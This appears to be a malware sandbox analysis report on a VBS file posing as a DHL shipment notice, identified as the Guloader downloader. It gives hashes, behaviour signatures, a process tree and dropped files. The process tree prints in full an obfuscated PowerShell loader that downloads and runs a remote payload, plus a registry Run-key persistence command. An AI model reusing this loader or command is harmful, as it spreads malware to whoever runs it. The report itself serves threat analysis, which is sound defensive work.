Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    30/05/2024, 06:01

General

  • Target

    DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs

  • Size

    22KB

  • MD5

    5a4ef048a5e3b38a1cfe3813955c1770

  • SHA1

    86b17e10f9ce90466020115a3cfbd0ae124289cf

  • SHA256

    a7024900ce77051e0df54b2553c5c18a90dafdc92fd8deaa9db50c2da551b549

  • SHA512

    0c792d3d9ccef5130b655570dab5c22864696b5796bf0a02718e57a387c8944c3633de65e00a6dcf272f16155e927d818820311099df134776a62a6c4d2c7a64

  • SSDEEP

    384:WryE8obOy6raaPOxBROArUfiyV9V4UXTDMm33/QCKPl84de6u8Y+9bkzxXXx5r6:WrwgO/aaPOxBNIdTDM634CKKSP9bsnxo

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs"
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe
      "C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe" "$Clothespins='S';$Clothespins+='ubs';$Clothespins+='tri';$homophene = 1;$Clothespins+='ng';Function Flugtskuds($presocial){$Antidemocracy=$presocial.Length-$homophene;For( $Antologia=4;$Antologia -lt $Antidemocracy;$Antologia+=5){$hydriodate+=$presocial.$Clothespins.Invoke( $Antologia, $homophene);}$hydriodate;}function Smedemestres($Reshipment){ . ($Sulevllingens) ($Reshipment);}$Heltinders=Flugtskuds ' ArrMTouco DeazCal.iU,stl Sl.l Proa C.b/Befo5E ko.Phot0Udsa S,ba( idgWSolsiDesmn nddHippo DogwTidesHand P.nNUmlaTFunk Stam1 Hem0 Sem.St t0 Nau; Ind BillW EneiExtrnTer.6Symb4 Lit;macr Gon.xFarv6Frk.4N,ad;Unel BurerBea,vMind:O,yb1Forn2 Me.1poly.Purp0Sibe) ,mp ,xteGSki eCi.icFe.tkManto Phy/Hos 2Clyp0Sc r1kat 0Baud0Oldf1Lyse0Pot,1 Bar B lFMeasiC emrSluie UncfFa.voA,tix Pos/Riss1Fors2Man 1S.id.Spis0Ele, ';$Calusar124=Flugtskuds 'TrknUFo lsSp.ieU enr wal-P,rmANandgmedieLiponWarstvi e ';$Vejl37=Flugtskuds ' Te.h Tent .ostInd,pBali:Befl/Thom/ Th.sCor hR.vee S.or OveeDolmiCynohBjlkn GoaaViuvoMusc.ophirPrimuVari.Cr.wc Orao L,vm.get/ dmaB.esne.laddReceevisidsturaStatgTappsFelsf rone TonrDunti,rhveInt,rA vi. DrahHugehEge.k,hap ';$Alemannisk=Flugtskuds ' Log>Opha ';$Sulevllingens=Flugtskuds 'MedliPavee,oloxGaff ';$Tris='Cycloheptanone';$Privatskifters = Flugtskuds 'Serpe.nwhc ntehSkato Unp chou%FyrfaRundp r,wpBrindNor,aBrnetGalva Dat%dehi\immuLGra a ImpcU.potButte.fleaGidsl Tryl EskyTret.MannHF kuvU.enepero Noni&Mono&m.ni B.oeop,icNyhehEaseoE er VredtU.gu ';Smedemestres (Flugtskuds ' ami$KbslgCycllErupo penbExaeaExcul dfl:mor S Solu SmibLuftm DrueSulkrVenugIde eUmbes la=Au t( KilcFortmP rrd Unr .enr/truec Art Bes.$PodiPk nfr DyniE.tevUdmaaLim t.elasRabikTr gi CelfEasttLr.eeIncrr riesK,to)Rigs ');Smedemestres (Flugtskuds ' Cr.$Omb gAft l ateo Va.bChowaTr al Maf:Ss eSKatapIconiNe.rdUddasNja.vNytaityphnUnlikFliml A.aeInter kopnArcte nss Srv=Augu$Me,mVHaaneBrnejRep.l,dor3Stor7 Sam. DiasGydepAdvelLulliSvejtBrys(Godc$VillAindilNonae AngmSkolaU,brn BannKodeiLor,sDirtkGrun) Tit ');$Vejl37=$Spidsvinklernes[0];$Nutrice236= (Flugtskuds 'B.ec$BjergFor lExuco Pa,bS.ppaKamrlSer :PlayL RabyPersmTerrp th.h dsoFagogGy.ar C uaJabbnSwaguClomlt,anoMo.nmAntaaMetrtAnsva.pho=HerbNAnteeMar,wBrne-subrOBlyfb PukjPyroeRickcPyknt S.n NonS.orgy eresbrsitBogseBladmPe,s.Un eN eveeHim.t Afs.BygnWIngee FllbFastCIntel.vari ereeDroenBug,t');$Nutrice236+=$Submerges[1];Smedemestres ($Nutrice236);Smedemestres (Flugtskuds 'Re,s$DampLR,sdyUncomAffap HughDraaoEnkegBepurRe saInven Diau Do.l .pro Kasmzyg,aLuftt Se,aOver.StatHprobe ntiaPro.dGla eUhanrf.rjsKont[ Rei$Spr,CBio.a StalSimiuMisbsAmtsaVerir pr1Tvun2 Up 4 Cu.] R,e= Ly.$FremHUtmme onslIs,ut disiWaggn C.ndNonseAntirPorts Gr ');$Plotterne=Flugtskuds 'subd$Vo dL saybo.umMontpN,nah GuboRatiganstrBffeaNonanStikuBin.lilioojustmfor.a De.tgrnlaKo,t.CiliDBetaoLat.wBestn canlBlueoHip a.orsdWardFSnd iPr.vl SpeeFred(Hayb$D,ipVB.gseEpisjhimmlAmph3me,r7Eddi, St.$VildSUlyktSpl,eS,ivr SwaeCyl oTilftpranyTalepKliniT,xicLeuk1Dels7san 1Nonv)supr ';$Stereotypic171=$Submerges[0];Smedemestres (Flugtskuds 'Eyvi$K engInculAniso Ur,bD.huaUnpllTilt:RollN DiroTru.nMyntpp.oblFluoapolitJustik,detBsseuDessd SkniTedanBrono.emeuOlefsNorf= Poi( ellTValueBurmsTorbt emn-FeliPK,mbawankt JrphBloo Wafe$ othSImplt OdoeUdtyrMonteFr ro LeatKuley .ffp ludi aakc mvi1 kan7,ege1R,co) Par ');while (!$Nonplatitudinous) {Smedemestres (Flugtskuds 'Park$NatigReellI.sioFrstbDecaaSupelmaal:OverUGa,nnSeisd Un,emyofrSteisVerttKirti,irkmFibruFodnlEkspeTor r.armeHanetBuld= Occ$Sioutpartrb tauSvume Sti ') ;Smedemestres $Plotterne;Smedemestres (Flugtskuds 'Oks S Nontt,nka Genr ,trtMudp- StuS WollBorgete.ie,uttpSeks Imp 4Ging ');Smedemestres (Flugtskuds 'M.nn$Re.tgRagol MicoBenob Blua.alelAger:SkytN FanoE conExtrpLokalManvaPeg,tSmdeiSek tRomauSoeddPo.ei FainD,vaoNikkumyelsHarc=Ecre(SkruTBukseAntisMlk t Pil- laPHephaB ndt Grehcayu Remo$Par,SBe etLseleCullrstaceRosmoArgotOutby onp AuriOve,cBo z1Plat7skri1Deso)Skov ') ;Smedemestres (Flugtskuds ' Lys$Spe,ganimlUn,ao GenbDiplaBr.vlHipp: FroS S,eaPe cf skrtBlanfG.stuTotrl T,edOvereIncosMarit Ufo=Abi.$ oeng St lToldoSingbMultaD,stl Und:.remR Udfuk bibMo eyIsthtO.hjhUnglrSl eoBeskaSpokt,tom1Ngen9Shod1Stan+Weat+Opdr%.rib$ Pi,SMercpAstii prodYngls OttvSvibiRednnSki.k Mo l Te,eOphirCa,enPlice Fa.sIntr.S iccAutoo FjeuA,onnExcotrigh ') ;$Vejl37=$Spidsvinklernes[$Saftfuldest];}$Terpede=284535;$Forestillet=28017;Smedemestres (Flugtskuds 'Blom$SnapgSordl,ruboDommb deea.adml Alk:Kl,oJMrkvoSubar SemdFastp CorrGonoi,idesAnci Over=Budg DoatG Vane IsetF au-KlagC.istoR,lanRef t.agaeBinonCordtLuch Pu.i$LgekS Valt ComeCrosrFl,re FusoS xat GanySmmop EariDjibc,ill1 ,od7Beg,1Sadi ');Smedemestres (Flugtskuds 'Ru,f$UnfigReeslIngvodkkebThuna F.nlS.tt:mortOEn,okSarrkAbsau DyspTrivebarbrSpe.iModunAi.hg,tjeeAngrr Ca.sT,ut Prin= Vmm S,pr[AtteSMystyGu.dsbefrtStereOen mS if.SquaCCo doSkilnTe,nv MideOverrAggrt Opl] Sub:Tear:GadeFairvrVegeoTottmLumbBIn,oaUntas TereHuar6Sted4 RepSBr.ct o hr An.i Carnsifog Kni(Baga$remoJfibro BlirSnumdMimep ,alrSkoliAa es Men)Spie ');Smedemestres (Flugtskuds 'Comp$Semig nnel.ranoSpgeb Gova ClilTon.:PennDOprre AmisS yloF,rirLb.igantia Du nIlseiLi.bsS,eneUncorKiw.e .serSoci Iref=Pre. Afri[LikvS D.ryO.ihs.utttFibieUnlimBeta.RundTCoryeEmanx Nerte sp.PiccEGalanDrikcS ggoDanid .igiDuvenHypogShor] Cou: Cle:FrapA UptSAgenCVurdI EksIH mp.OktaGGgedeTifftPresS reftFornrVertiUntonVan,gTi.w( He.$RevuODgnkkPlouksu euSerapSvigeN.tirSundiMuninMaalg PytefranrPs,uskomm)Blid ');Smedemestres (Flugtskuds 'Rete$ ,ongCabalAchlo Genb enaDagsl Sel: FasBUdtreforbs Fr,pPolyiPac c ymbeTog =Koll$s,raDKumee.rgos UnhoLolarNoncg.lleaDisenBileiLu,usFlj.eBai.rDdmaeAmy,rZemi.TonesdrukuKalkbMesssSwadtGustrCentiLambnDe,agTra (Rust$SkatT.ofteChrirTanapSpale Band E.teSvol,Fors$.racFpreooK serBri.eEksesPhiltKlini ,aklCam,lNondeForatRest)Dipl ');Smedemestres $Bespice;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lacteally.Hve && echo t"
        3⤵
          PID:2480
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Clothespins='S';$Clothespins+='ubs';$Clothespins+='tri';$homophene = 1;$Clothespins+='ng';Function Flugtskuds($presocial){$Antidemocracy=$presocial.Length-$homophene;For( $Antologia=4;$Antologia -lt $Antidemocracy;$Antologia+=5){$hydriodate+=$presocial.$Clothespins.Invoke( $Antologia, $homophene);}$hydriodate;}function Smedemestres($Reshipment){ . ($Sulevllingens) ($Reshipment);}$Heltinders=Flugtskuds ' ArrMTouco DeazCal.iU,stl Sl.l Proa C.b/Befo5E ko.Phot0Udsa S,ba( idgWSolsiDesmn nddHippo DogwTidesHand P.nNUmlaTFunk Stam1 Hem0 Sem.St t0 Nau; Ind BillW EneiExtrnTer.6Symb4 Lit;macr Gon.xFarv6Frk.4N,ad;Unel BurerBea,vMind:O,yb1Forn2 Me.1poly.Purp0Sibe) ,mp ,xteGSki eCi.icFe.tkManto Phy/Hos 2Clyp0Sc r1kat 0Baud0Oldf1Lyse0Pot,1 Bar B lFMeasiC emrSluie UncfFa.voA,tix Pos/Riss1Fors2Man 1S.id.Spis0Ele, ';$Calusar124=Flugtskuds 'TrknUFo lsSp.ieU enr wal-P,rmANandgmedieLiponWarstvi e ';$Vejl37=Flugtskuds ' Te.h Tent .ostInd,pBali:Befl/Thom/ Th.sCor hR.vee S.or OveeDolmiCynohBjlkn GoaaViuvoMusc.ophirPrimuVari.Cr.wc Orao L,vm.get/ dmaB.esne.laddReceevisidsturaStatgTappsFelsf rone TonrDunti,rhveInt,rA vi. DrahHugehEge.k,hap ';$Alemannisk=Flugtskuds ' Log>Opha ';$Sulevllingens=Flugtskuds 'MedliPavee,oloxGaff ';$Tris='Cycloheptanone';$Privatskifters = Flugtskuds 'Serpe.nwhc ntehSkato Unp chou%FyrfaRundp r,wpBrindNor,aBrnetGalva Dat%dehi\immuLGra a ImpcU.potButte.fleaGidsl Tryl EskyTret.MannHF kuvU.enepero Noni&Mono&m.ni B.oeop,icNyhehEaseoE er VredtU.gu ';Smedemestres (Flugtskuds ' ami$KbslgCycllErupo penbExaeaExcul dfl:mor S Solu SmibLuftm DrueSulkrVenugIde eUmbes la=Au t( KilcFortmP rrd Unr .enr/truec Art Bes.$PodiPk nfr DyniE.tevUdmaaLim t.elasRabikTr gi CelfEasttLr.eeIncrr riesK,to)Rigs ');Smedemestres (Flugtskuds ' Cr.$Omb gAft l ateo Va.bChowaTr al Maf:Ss eSKatapIconiNe.rdUddasNja.vNytaityphnUnlikFliml A.aeInter kopnArcte nss Srv=Augu$Me,mVHaaneBrnejRep.l,dor3Stor7 Sam. DiasGydepAdvelLulliSvejtBrys(Godc$VillAindilNonae AngmSkolaU,brn BannKodeiLor,sDirtkGrun) Tit ');$Vejl37=$Spidsvinklernes[0];$Nutrice236= (Flugtskuds 'B.ec$BjergFor lExuco Pa,bS.ppaKamrlSer :PlayL RabyPersmTerrp th.h dsoFagogGy.ar C uaJabbnSwaguClomlt,anoMo.nmAntaaMetrtAnsva.pho=HerbNAnteeMar,wBrne-subrOBlyfb PukjPyroeRickcPyknt S.n NonS.orgy eresbrsitBogseBladmPe,s.Un eN eveeHim.t Afs.BygnWIngee FllbFastCIntel.vari ereeDroenBug,t');$Nutrice236+=$Submerges[1];Smedemestres ($Nutrice236);Smedemestres (Flugtskuds 'Re,s$DampLR,sdyUncomAffap HughDraaoEnkegBepurRe saInven Diau Do.l .pro Kasmzyg,aLuftt Se,aOver.StatHprobe ntiaPro.dGla eUhanrf.rjsKont[ Rei$Spr,CBio.a StalSimiuMisbsAmtsaVerir pr1Tvun2 Up 4 Cu.] R,e= Ly.$FremHUtmme onslIs,ut disiWaggn C.ndNonseAntirPorts Gr ');$Plotterne=Flugtskuds 'subd$Vo dL saybo.umMontpN,nah GuboRatiganstrBffeaNonanStikuBin.lilioojustmfor.a De.tgrnlaKo,t.CiliDBetaoLat.wBestn canlBlueoHip a.orsdWardFSnd iPr.vl SpeeFred(Hayb$D,ipVB.gseEpisjhimmlAmph3me,r7Eddi, St.$VildSUlyktSpl,eS,ivr SwaeCyl oTilftpranyTalepKliniT,xicLeuk1Dels7san 1Nonv)supr ';$Stereotypic171=$Submerges[0];Smedemestres (Flugtskuds 'Eyvi$K engInculAniso Ur,bD.huaUnpllTilt:RollN DiroTru.nMyntpp.oblFluoapolitJustik,detBsseuDessd SkniTedanBrono.emeuOlefsNorf= Poi( ellTValueBurmsTorbt emn-FeliPK,mbawankt JrphBloo Wafe$ othSImplt OdoeUdtyrMonteFr ro LeatKuley .ffp ludi aakc mvi1 kan7,ege1R,co) Par ');while (!$Nonplatitudinous) {Smedemestres (Flugtskuds 'Park$NatigReellI.sioFrstbDecaaSupelmaal:OverUGa,nnSeisd Un,emyofrSteisVerttKirti,irkmFibruFodnlEkspeTor r.armeHanetBuld= Occ$Sioutpartrb tauSvume Sti ') ;Smedemestres $Plotterne;Smedemestres (Flugtskuds 'Oks S Nontt,nka Genr ,trtMudp- StuS WollBorgete.ie,uttpSeks Imp 4Ging ');Smedemestres (Flugtskuds 'M.nn$Re.tgRagol MicoBenob Blua.alelAger:SkytN FanoE conExtrpLokalManvaPeg,tSmdeiSek tRomauSoeddPo.ei FainD,vaoNikkumyelsHarc=Ecre(SkruTBukseAntisMlk t Pil- laPHephaB ndt Grehcayu Remo$Par,SBe etLseleCullrstaceRosmoArgotOutby onp AuriOve,cBo z1Plat7skri1Deso)Skov ') ;Smedemestres (Flugtskuds ' Lys$Spe,ganimlUn,ao GenbDiplaBr.vlHipp: FroS S,eaPe cf skrtBlanfG.stuTotrl T,edOvereIncosMarit Ufo=Abi.$ oeng St lToldoSingbMultaD,stl Und:.remR Udfuk bibMo eyIsthtO.hjhUnglrSl eoBeskaSpokt,tom1Ngen9Shod1Stan+Weat+Opdr%.rib$ Pi,SMercpAstii prodYngls OttvSvibiRednnSki.k Mo l Te,eOphirCa,enPlice Fa.sIntr.S iccAutoo FjeuA,onnExcotrigh ') ;$Vejl37=$Spidsvinklernes[$Saftfuldest];}$Terpede=284535;$Forestillet=28017;Smedemestres (Flugtskuds 'Blom$SnapgSordl,ruboDommb deea.adml Alk:Kl,oJMrkvoSubar SemdFastp CorrGonoi,idesAnci Over=Budg DoatG Vane IsetF au-KlagC.istoR,lanRef t.agaeBinonCordtLuch Pu.i$LgekS Valt ComeCrosrFl,re FusoS xat GanySmmop EariDjibc,ill1 ,od7Beg,1Sadi ');Smedemestres (Flugtskuds 'Ru,f$UnfigReeslIngvodkkebThuna F.nlS.tt:mortOEn,okSarrkAbsau DyspTrivebarbrSpe.iModunAi.hg,tjeeAngrr Ca.sT,ut Prin= Vmm S,pr[AtteSMystyGu.dsbefrtStereOen mS if.SquaCCo doSkilnTe,nv MideOverrAggrt Opl] Sub:Tear:GadeFairvrVegeoTottmLumbBIn,oaUntas TereHuar6Sted4 RepSBr.ct o hr An.i Carnsifog Kni(Baga$remoJfibro BlirSnumdMimep ,alrSkoliAa es Men)Spie ');Smedemestres (Flugtskuds 'Comp$Semig nnel.ranoSpgeb Gova ClilTon.:PennDOprre AmisS yloF,rirLb.igantia Du nIlseiLi.bsS,eneUncorKiw.e .serSoci Iref=Pre. Afri[LikvS D.ryO.ihs.utttFibieUnlimBeta.RundTCoryeEmanx Nerte sp.PiccEGalanDrikcS ggoDanid .igiDuvenHypogShor] Cou: Cle:FrapA UptSAgenCVurdI EksIH mp.OktaGGgedeTifftPresS reftFornrVertiUntonVan,gTi.w( He.$RevuODgnkkPlouksu euSerapSvigeN.tirSundiMuninMaalg PytefranrPs,uskomm)Blid ');Smedemestres (Flugtskuds 'Rete$ ,ongCabalAchlo Genb enaDagsl Sel: FasBUdtreforbs Fr,pPolyiPac c ymbeTog =Koll$s,raDKumee.rgos UnhoLolarNoncg.lleaDisenBileiLu,usFlj.eBai.rDdmaeAmy,rZemi.TonesdrukuKalkbMesssSwadtGustrCentiLambnDe,agTra (Rust$SkatT.ofteChrirTanapSpale Band E.teSvol,Fors$.racFpreooK serBri.eEksesPhiltKlini ,aklCam,lNondeForatRest)Dipl ');Smedemestres $Bespice;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lacteally.Hve && echo t"
            4⤵
              PID:2748
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dentures" /t REG_EXPAND_SZ /d "%Cheveril% -w 1 $Corgi18=(Get-ItemProperty -Path 'HKCU:\Hovedsymptomets\').Delested;%Cheveril% ($Corgi18)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1948
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dentures" /t REG_EXPAND_SZ /d "%Cheveril% -w 1 $Corgi18=(Get-ItemProperty -Path 'HKCU:\Hovedsymptomets\').Delested;%Cheveril% ($Corgi18)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2800

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • C:\Users\Admin\AppData\Local\Temp\Tar1154.tmp

        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      • C:\Users\Admin\AppData\Roaming\Lacteally.Hve

        Filesize

        406KB

        MD5

        f6b1bbc5b150013484e75df1e46cf10d

        SHA1

        22d721a50b9334333e211559f426eeb1f3e04135

        SHA256

        a8e38cc88496b3c517405e00172e31c6b723c87acc3b9a57fabab8cd26bba715

        SHA512

        5b322a2148e51eadf2dcdc2ff5f6dc2165bf9595a6a8f20bed7ea73b00747c92133051a6e27e1eb058ecdea1fe449cfa0efb0739d7c9129f5b2b686518dfcc98

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        049b2918def9f8407994a954c4c1c6dc

        SHA1

        06c308ae3584d6fa957d3d1215a030e25f3ce0ce

        SHA256

        49927facc48bb4f88e2a8c98a8bfe9df970654eb924bdafb73a4e81a3ba4e202

        SHA512

        e02bf2bf023bf6d69a5abe2af545e183e62351e727138290298432b912b566304706a73791b73bdd7c94924e89bf125781ebe181b0df959eefb5d8d191fb21a1

      • memory/2604-51-0x00000000066E0000-0x0000000008048000-memory.dmp

        Filesize

        25.4MB

      • memory/2704-39-0x0000000073740000-0x0000000073CEB000-memory.dmp

        Filesize

        5.7MB

      • memory/2704-42-0x0000000073740000-0x0000000073CEB000-memory.dmp

        Filesize

        5.7MB

      • memory/2704-41-0x0000000073740000-0x0000000073CEB000-memory.dmp

        Filesize

        5.7MB

      • memory/2704-40-0x0000000073740000-0x0000000073CEB000-memory.dmp

        Filesize

        5.7MB

      • memory/2704-38-0x0000000073741000-0x0000000073742000-memory.dmp

        Filesize

        4KB

      • memory/2704-52-0x0000000073740000-0x0000000073CEB000-memory.dmp

        Filesize

        5.7MB

      • memory/2704-55-0x0000000073740000-0x0000000073CEB000-memory.dmp

        Filesize

        5.7MB

      • memory/2760-54-0x0000000000590000-0x0000000001EF8000-memory.dmp

        Filesize

        25.4MB

      • memory/2760-56-0x0000000000590000-0x0000000001EF8000-memory.dmp

        Filesize

        25.4MB